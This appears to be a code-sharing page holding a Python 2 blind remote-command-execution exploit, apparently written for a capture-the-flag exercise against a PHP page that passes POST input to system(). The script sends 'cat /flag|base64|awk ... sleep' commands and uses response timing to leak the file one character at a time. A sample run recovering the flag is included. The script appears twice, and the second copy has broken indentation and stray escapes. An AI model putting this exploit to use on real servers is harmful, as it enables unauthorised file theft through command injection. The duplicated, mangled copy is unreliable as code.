WangYihang · September 18, 2018 09:50
diff --git a/blind_rce_exploit.py b/blind_rce_exploit.py
 #!/usr/bin/env python

 '''
 # cat /flag
 flag{blind_rce_exploit}

 # cat /var/www/html/index.php
 <?php
 system($_POST['command']);

 # python blind_rce_exploit.py
 Z
 Zm
 Zmx
 ...
 ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH
 ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH0
 ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH0K

 [+]: flag{blind_rce_exploit}
 '''

 import sys
 import requests

 HOST = "127.0.0.1"
 PORT = 8099

 def system(command):
    url = "http://%s:%d/" % (HOST, PORT)
    data = {
        "command":command,
    }
    try:
        requests.post(url, data=data, timeout=0.1).content
        return False
    except requests.exceptions.ReadTimeout as e:
        return True
    except Exception as e:
        print e
        return False

 def guess_one_byte(index, char):
    command = ("cat /flag|base64|awk '{if(substr($1,%d,1)==\"%s\") system(\"sleep 0.2\") }'" % (index + 1, repr(char)[1:-1]))
    return system(command)

 def guess(charset):
    result = ""
    i = 0
    while True:
        found = False
        for j in charset:
            # sys.stderr.write(result + j + "\r")
            if guess_one_byte(i, j):
                result += j
                print result
                found = True
        if not found:
            break
        i += 1
    sys.stderr.write("\n")
    return result

 # charset = set("0123456789abcdef-")
 # charset = [chr(i) for i in range(0x20, 0x80)]
 charset = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-/")
 content = guess(charset)
 print "[+]: %s" % content.decode("base64")
	#!/usr/bin/env python

	'''
	# cat /flag
	flag{blind_rce_exploit}

	# cat /var/www/html/index.php
	<?php
	system($_POST['command']);

	# python blind_rce_exploit.py
	Z
	Zm
	Zmx
	...
	ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH
	ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH0
	ZmxhZ3tibGluZF9yY2VfZXhwbG9pdH0K

	[+]: flag{blind_rce_exploit}
	'''

	import sys
	import requests

	HOST = "127.0.0.1"
	PORT = 8099

	def system(command):
	url = "http://%s:%d/" % (HOST, PORT)
	data = {
	"command":command,
	}
	try:
	requests.post(url, data=data, timeout=0.1).content
	return False
	except requests.exceptions.ReadTimeout as e:
	return True
	except Exception as e:
	print e
	return False

	def guess_one_byte(index, char):
	command = ("cat /flag\|base64\|awk '{if(substr($1,%d,1)==\"%s\") system(\"sleep 0.2\") }'" % (index + 1, repr(char)[1:-1]))
	return system(command)

	def guess(charset):
	result = ""
	i = 0
	while True:
	found = False
	for j in charset:
	# sys.stderr.write(result + j + "\r")
	if guess_one_byte(i, j):
	result += j
	print result
	found = True
	if not found:
	break
	i += 1
	sys.stderr.write("\n")
	return result

	# charset = set("0123456789abcdef-")
	# charset = [chr(i) for i in range(0x20, 0x80)]
	charset = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-/")
	content = guess(charset)
	print "[+]: %s" % content.decode("base64")